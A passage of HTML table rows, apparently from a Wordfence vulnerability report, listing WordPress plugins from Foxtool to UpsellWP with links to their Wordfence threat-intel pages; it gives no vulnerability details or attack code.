			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/foxtool" target="_blank" rel="noopener">foxtool</a>
		</td>
</tr>
<tr>
<td>Generate PDF using Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/generate-pdf-using-contact-form-7" target="_blank" rel="noopener">generate-pdf-using-contact-form-7</a>
		</td>
</tr>
<tr>
<td>GenieWords</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geniewords" target="_blank" rel="noopener">geniewords</a>
		</td>
</tr>
<tr>
<td>Geo Mashup</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-mashup" target="_blank" rel="noopener">geo-mashup</a>
		</td>
</tr>
<tr>
<td>Getwid – Gutenberg Blocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/getwid" target="_blank" rel="noopener">getwid</a>
		</td>
</tr>
<tr>
<td>GiveWP – Donation Plugin and Fundraising Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">give</a>
		</td>
</tr>
<tr>
<td>GoPay for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gopay-gateway" target="_blank" rel="noopener">gopay-gateway</a>
		</td>
</tr>
<tr>
<td>GPTranslate – Multilingual AI Translation Agent for WordPress: Translate Your Site with AI</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gptranslate" target="_blank" rel="noopener">gptranslate</a>
		</td>
</tr>
<tr>
<td>Gravity Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gravityforms" target="_blank" rel="noopener">gravityforms</a>
		</td>
</tr>
<tr>
<td>Gum Addon for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gum-elementor-addon" target="_blank" rel="noopener">gum-elementor-addon</a>
		</td>
</tr>
<tr>
<td>Headless SSO Plugin for WP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/headless-single-sign-on" target="_blank" rel="noopener">headless-single-sign-on</a>
		</td>
</tr>
<tr>
<td>Hide My WP Ghost – Security &amp; Firewall</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">hide-my-wp</a>
		</td>
</tr>
<tr>
<td>Hoo Companion</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hoo-companion" target="_blank" rel="noopener">hoo-companion</a>
		</td>
</tr>
<tr>
<td>HT Mega Addons for Elementor – Elementor Widgets &amp; Template Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-mega-for-elementor" target="_blank" rel="noopener">ht-mega-for-elementor</a>
		</td>
</tr>
<tr>
<td>Hydra Booking — Appointment Scheduling &amp; Booking Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hydra-booking" target="_blank" rel="noopener">hydra-booking</a>
		</td>
</tr>
<tr>
<td>Ibtana – Ecommerce Product Addons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ibtana-ecommerce-product-addons" target="_blank" rel="noopener">ibtana-ecommerce-product-addons</a>
		</td>
</tr>
<tr>
<td>IDB Ecommerce (wpStoreCart 5)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpstorecart" target="_blank" rel="noopener">wpstorecart</a>
		</td>
</tr>
<tr>
<td>iGMS Direct Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/igms-direct-booking" target="_blank" rel="noopener">igms-direct-booking</a>
		</td>
</tr>
<tr>
<td>Import and export users and customers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/import-users-from-csv-with-meta" target="_blank" rel="noopener">import-users-from-csv-with-meta</a>
		</td>
</tr>
<tr>
<td>InfiniteWP Client</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/iwp-client" target="_blank" rel="noopener">iwp-client</a>
		</td>
</tr>
<tr>
<td>Invisible Anti-Spam &amp; CAPTCHA — reCAPTCHA Alternative for All Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-compliant-recaptcha-for-all-forms" target="_blank" rel="noopener">gdpr-compliant-recaptcha-for-all-forms</a>
		</td>
</tr>
<tr>
<td>Issues and Series for Newspapers, Magazines, Publishers, Writers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/organize-series" target="_blank" rel="noopener">organize-series</a>
		</td>
</tr>
<tr>
<td>Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">jeg-elementor-kit</a>
		</td>
</tr>
<tr>
<td>JetBlocks for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blocks" target="_blank" rel="noopener">jet-blocks</a>
		</td>
</tr>
<tr>
<td>JetBlog</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blog" target="_blank" rel="noopener">jet-blog</a>
		</td>
</tr>
<tr>
<td>JetElements</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-elements" target="_blank" rel="noopener">jet-elements</a>
		</td>
</tr>
<tr>
<td>JetFormBuilder — Dynamic Blocks Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetformbuilder" target="_blank" rel="noopener">jetformbuilder</a>
		</td>
</tr>
<tr>
<td>JetSearch</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-search" target="_blank" rel="noopener">jet-search</a>
		</td>
</tr>
<tr>
<td>JetTabs</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-tabs" target="_blank" rel="noopener">jet-tabs</a>
		</td>
</tr>
<tr>
<td>Job Postings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/job-postings" target="_blank" rel="noopener">job-postings</a>
		</td>
</tr>
<tr>
<td>JWT Authentication for WP REST APIs</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-rest-api-authentication" target="_blank" rel="noopener">wp-rest-api-authentication</a>
		</td>
</tr>
<tr>
<td>kboard</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kboard" target="_blank" rel="noopener">kboard</a>
		</td>
</tr>
<tr>
<td>King Addons for Elementor – 100+ Elementor Widgets, 4 000+ Elementor Templates, WooCommerce Builder, Mega Menu, Popup Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/king-addons" target="_blank" rel="noopener">king-addons</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>Kubio AI Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio" target="_blank" rel="noopener">kubio</a>
		</td>
</tr>
<tr>
<td>LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">learnpress</a>
		</td>
</tr>
<tr>
<td>LiteSpeed Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache" target="_blank" rel="noopener">litespeed-cache</a>
		</td>
</tr>
<tr>
<td>Location Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geodir_location_manager" target="_blank" rel="noopener">geodir_location_manager</a>
		</td>
</tr>
<tr>
<td>Login with QR</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/login-with-qr" target="_blank" rel="noopener">login-with-qr</a>
		</td>
</tr>
<tr>
<td>Magazine Blocks – Blog Designer, Magazine &amp; Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/magazine-blocks" target="_blank" rel="noopener">magazine-blocks</a>
		</td>
</tr>
<tr>
<td>Mailchimp for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-for-woocommerce" target="_blank" rel="noopener">mailchimp-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Mapster WP Maps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapster-wp-maps" target="_blank" rel="noopener">mapster-wp-maps</a>
		</td>
</tr>
<tr>
<td>Master Addons for Elementor – Elementor Addons, Widgets, Mega Menu Builder, Popup Builder, Widget Builder &amp; Template Kits</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/master-addons" target="_blank" rel="noopener">master-addons</a>
		</td>
</tr>
<tr>
<td>Master Blocks – Ultimate Blocks for Marketers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-blocks-for-gutenberg" target="_blank" rel="noopener">ultimate-blocks-for-gutenberg</a>
		</td>
</tr>
<tr>
<td>Master Slider – Responsive Touch Slider</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/master-slider" target="_blank" rel="noopener">master-slider</a>
		</td>
</tr>
<tr>
<td>MasterStudy LMS WordPress Plugin – for Online Courses and Education</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">masterstudy-lms-learning-management-system</a>
		</td>
</tr>
<tr>
<td>MC4WP: Mailchimp for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-for-wp" target="_blank" rel="noopener">mailchimp-for-wp</a>
		</td>
</tr>
<tr>
<td>Meow Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meow-gallery" target="_blank" rel="noopener">meow-gallery</a>
		</td>
</tr>
<tr>
<td>MgoSync – European dropshipping and suppliers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/megamo" target="_blank" rel="noopener">megamo</a>
		</td>
</tr>
<tr>
<td>Migratico Lite</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/migratico-lite" target="_blank" rel="noopener">migratico-lite</a>
		</td>
</tr>
<tr>
<td>MoreConvert Wishlist for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-wishlist-for-more-convert" target="_blank" rel="noopener">smart-wishlist-for-more-convert</a>
		</td>
</tr>
<tr>
<td>MotoPress Hotel Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/motopress-hotel-booking-lite" target="_blank" rel="noopener">motopress-hotel-booking-lite</a>
		</td>
</tr>
<tr>
<td>Motors – Car Dealership &amp; Classified Listings Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/motors-car-dealership-classified-listings" target="_blank" rel="noopener">motors-car-dealership-classified-listings</a>
		</td>
</tr>
<tr>
<td>Multi Uploader for Gravity Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gf-multi-uploader" target="_blank" rel="noopener">gf-multi-uploader</a>
		</td>
</tr>
<tr>
<td>MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">dc-woocommerce-multi-vendor</a>
		</td>
</tr>
<tr>
<td>Newsletter</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter-email-mailing-list" target="_blank" rel="noopener">newsletter-email-mailing-list</a>
		</td>
</tr>
<tr>
<td>Newsletter – Send awesome emails from WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter" target="_blank" rel="noopener">newsletter</a>
		</td>
</tr>
<tr>
<td>Newsletters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">newsletters-lite</a>
		</td>
</tr>
<tr>
<td>NEX-Forms – Ultimate Forms Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nex-forms-express-wp-form-builder" target="_blank" rel="noopener">nex-forms-express-wp-form-builder</a>
		</td>
</tr>
<tr>
<td>Ni WooCommerce Sales Report – Orders, Revenue &amp; Sales Analytics Dashboard</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ni-woocommerce-sales-report" target="_blank" rel="noopener">ni-woocommerce-sales-report</a>
		</td>
</tr>
<tr>
<td>Nimble Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nimble-builder" target="_blank" rel="noopener">nimble-builder</a>
		</td>
</tr>
<tr>
<td>Online Scheduling and Appointment Booking System – Bookly</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">bookly-responsive-appointment-booking-tool</a>
		</td>
</tr>
<tr>
<td>Optimole – Optimize Images | Convert WebP &amp; AVIF | CDN &amp; Lazy Load | Image Optimization</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/optimole-wp" target="_blank" rel="noopener">optimole-wp</a>
		</td>
</tr>
<tr>
<td>OTP Login &amp; Register Woocommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-login-woocommerce" target="_blank" rel="noopener">mobile-login-woocommerce</a>
		</td>
</tr>
<tr>
<td>Paid Downloads</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-downloads" target="_blank" rel="noopener">paid-downloads</a>
		</td>
</tr>
<tr>
<td>Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content – ProfilePress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar" target="_blank" rel="noopener">wp-user-avatar</a>
		</td>
</tr>
<tr>
<td>Paid Membership Subscriptions – Effortless Memberships, Recurring Payments &amp; Content Restriction</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-member-subscriptions" target="_blank" rel="noopener">paid-member-subscriptions</a>
		</td>
</tr>
<tr>
<td>Partial Shipment for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-partial-shipment" target="_blank" rel="noopener">wc-partial-shipment</a>
		</td>
</tr>
<tr>
<td>Payment Gateway for PayPal on WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-paypal-gateway" target="_blank" rel="noopener">woo-paypal-gateway</a>
		</td>
</tr>
<tr>
<td>Payment Gateway of Stripe for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payment-gateway-stripe-and-woocommerce-integration" target="_blank" rel="noopener">payment-gateway-stripe-and-woocommerce-integration</a>
		</td>
</tr>
<tr>
<td>PDF Builder for WooCommerce. Create invoices,packing slips and more</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-pdf-invoice-builder" target="_blank" rel="noopener">woo-pdf-invoice-builder</a>
		</td>
</tr>
<tr>
<td>Photo Gallery by 10Web – Mobile-Friendly Image Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery" target="_blank" rel="noopener">photo-gallery</a>
		</td>
</tr>
<tr>
<td>Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextgen-gallery" target="_blank" rel="noopener">nextgen-gallery</a>
		</td>
</tr>
<tr>
<td>Pochipp</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pochipp" target="_blank" rel="noopener">pochipp</a>
		</td>
</tr>
<tr>
<td>Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popup Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-maker" target="_blank" rel="noopener">popup-maker</a>
		</td>
</tr>
<tr>
<td>Price Drop Alert for Woo Commerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-price-drop-alert" target="_blank" rel="noopener">woo-price-drop-alert</a>
		</td>
</tr>
<tr>
<td>Printcart Store – Web to Print Product Designer for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/printcart-integration" target="_blank" rel="noopener">printcart-integration</a>
		</td>
</tr>
<tr>
<td>Private Feed Key</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/private-feed-key" target="_blank" rel="noopener">private-feed-key</a>
		</td>
</tr>
<tr>
<td>Product Feed Manager for WooCommerce – RexFeed – Sell on 200+ Shopping Channels</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/best-woocommerce-feed" target="_blank" rel="noopener">best-woocommerce-feed</a>
		</td>
</tr>
<tr>
<td>Product Question and Answer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-question-and-answer" target="_blank" rel="noopener">product-question-and-answer</a>
		</td>
</tr>
<tr>
<td>Property Hive</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/propertyhive" target="_blank" rel="noopener">propertyhive</a>
		</td>
</tr>
<tr>
<td>PuppyFW</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/puppyfw" target="_blank" rel="noopener">puppyfw</a>
		</td>
</tr>
<tr>
<td>Qi Addons For Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qi-addons-for-elementor" target="_blank" rel="noopener">qi-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>Quill Forms | Conversational Multi Step Forms, Surveys &amp; quizzes</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quillforms" target="_blank" rel="noopener">quillforms</a>
		</td>
</tr>
<tr>
<td>Real3D Flipbook – 3D FlipBook, PDF FlipBook, PDF Viewer, PDF Embedder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real3d-flipbook-lite" target="_blank" rel="noopener">real3d-flipbook-lite</a>
		</td>
</tr>
<tr>
<td>Really Simple Security – Simple and Performant Security (formerly Really Simple SSL)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/really-simple-ssl" target="_blank" rel="noopener">really-simple-ssl</a>
		</td>
</tr>
<tr>
<td>Realtyna Organic IDX plugin + WPL Real Estate</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">real-estate-listing-realtyna-wpl</a>
		</td>
</tr>
<tr>
<td>Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-rede" target="_blank" rel="noopener">woo-rede</a>
		</td>
</tr>
<tr>
<td>Redux Framework</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/redux-framework" target="_blank" rel="noopener">redux-framework</a>
		</td>
</tr>
<tr>
<td>RestroPress – Online Food Ordering System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress" target="_blank" rel="noopener">restropress</a>
		</td>
</tr>
<tr>
<td>Robokassa payment gateway for Woocommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/robokassa" target="_blank" rel="noopener">robokassa</a>
		</td>
</tr>
<tr>
<td>Rox Appointment Booking – Appointment Booking Scheduling Solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rox-appointment-booking" target="_blank" rel="noopener">rox-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Royal Addons for Elementor – Addons and Templates Kit for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">royal-elementor-addons</a>
		</td>
</tr>
<tr>
<td>RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">rt-mega-menu</a>
		</td>
</tr>
<tr>
<td>SAML Single Sign On – SSO Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">miniorange-saml-20-single-sign-on</a>
		</td>
</tr>
<tr>
<td>SAMO Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/samo-forms" target="_blank" rel="noopener">samo-forms</a>
		</td>
</tr>
<tr>
<td>Save as PDF Plugin by PDFCrowd</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/save-as-pdf-by-pdfcrowd" target="_blank" rel="noopener">save-as-pdf-by-pdfcrowd</a>
		</td>
</tr>
<tr>
<td>Schema &amp; Structured Data for WP &amp; AMP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/schema-and-structured-data-for-wp" target="_blank" rel="noopener">schema-and-structured-data-for-wp</a>
		</td>
</tr>
<tr>
<td>Search Atlas SEO – OTTO AI SEO Automation for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metasync" target="_blank" rel="noopener">metasync</a>
		</td>
</tr>
<tr>
<td>Secure Custom Fields</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/secure-custom-fields" target="_blank" rel="noopener">secure-custom-fields</a>
		</td>
</tr>
<tr>
<td>SEO Booster</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-booster" target="_blank" rel="noopener">seo-booster</a>
		</td>
</tr>
<tr>
<td>Seraphinite Accelerator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seraphinite-accelerator" target="_blank" rel="noopener">seraphinite-accelerator</a>
		</td>
</tr>
<tr>
<td>Share-one-Drive | OneDrive &amp; SharePoint plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shareonedrive-onedrive-plugin-for-wordpress" target="_blank" rel="noopener">shareonedrive-onedrive-plugin-for-wordpress</a>
		</td>
</tr>
<tr>
<td>ShopEngine Elementor WooCommerce Builder Addon – All in One WooCommerce Solution with eCommerce Templates &amp; Woo Widgets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shopengine" target="_blank" rel="noopener">shopengine</a>
		</td>
</tr>
<tr>
<td>ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">woolentor-addons</a>
		</td>
</tr>
<tr>
<td>ShortPixel Image Optimizer – Optimize Images, Convert WebP &amp; AVIF</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortpixel-image-optimiser" target="_blank" rel="noopener">shortpixel-image-optimiser</a>
		</td>
</tr>
<tr>
<td>Sign-up Sheets</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sign-up-sheets" target="_blank" rel="noopener">sign-up-sheets</a>
		</td>
</tr>
<tr>
<td>Simple Membership</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-membership" target="_blank" rel="noopener">simple-membership</a>
		</td>
</tr>
<tr>
<td>SKT Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/skt-addons-for-elementor" target="_blank" rel="noopener">skt-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ssl-zen" target="_blank" rel="noopener">ssl-zen</a>
		</td>
</tr>
<tr>
<td>Store Exporter – Export WooCommerce Products, Orders, Subscriptions, Customers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-exporter" target="_blank" rel="noopener">woocommerce-exporter</a>
		</td>
</tr>
<tr>
<td>Strong Testimonials</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/strong-testimonials" target="_blank" rel="noopener">strong-testimonials</a>
		</td>
</tr>
<tr>
<td>Subscriptions for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">subscriptions-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>The Pressengine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-pressengine" target="_blank" rel="noopener">the-pressengine</a>
		</td>
</tr>
<tr>
<td>The Welcomizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-welcomizer" target="_blank" rel="noopener">the-welcomizer</a>
		</td>
</tr>
<tr>
<td>TikTok</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tiktok-for-business" target="_blank" rel="noopener">tiktok-for-business</a>
		</td>
</tr>
<tr>
<td>To Do List Member</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/todo-lists-for-membership-sites" target="_blank" rel="noopener">todo-lists-for-membership-sites</a>
		</td>
</tr>
<tr>
<td>Tripzzy – Travel Engine System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tripzzy" target="_blank" rel="noopener">tripzzy</a>
		</td>
</tr>
<tr>
<td>TrueBooker – Appointment Booking and Scheduler System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">truebooker-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Tutor LMS – eLearning and online course solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">tutor</a>
		</td>
</tr>
<tr>
<td>Tz Weekly Radio Schedule</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tz-wrs-core" target="_blank" rel="noopener">tz-wrs-core</a>
		</td>
</tr>
<tr>
<td>Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction &amp; Membership Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-member" target="_blank" rel="noopener">ultimate-member</a>
		</td>
</tr>
<tr>
<td>Ultra Addons for Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-contact-form-7" target="_blank" rel="noopener">ultimate-addons-for-contact-form-7</a>
		</td>
</tr>
<tr>
<td>Unbounce Landing Pages</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unbounce" target="_blank" rel="noopener">unbounce</a>
		</td>
</tr>
<tr>
<td>Unlimited Elements For Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor" target="_blank" rel="noopener">unlimited-elements-for-elementor</a>
		</td>
</tr>
<tr>
<td>UpsellWP – Upsell and Related Products Offers for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-upsell-and-order-bumps" target="_blank" rel="noopener">checkout-upsell-and-order-bumps</a>
		</td>
</tr>
<tr>
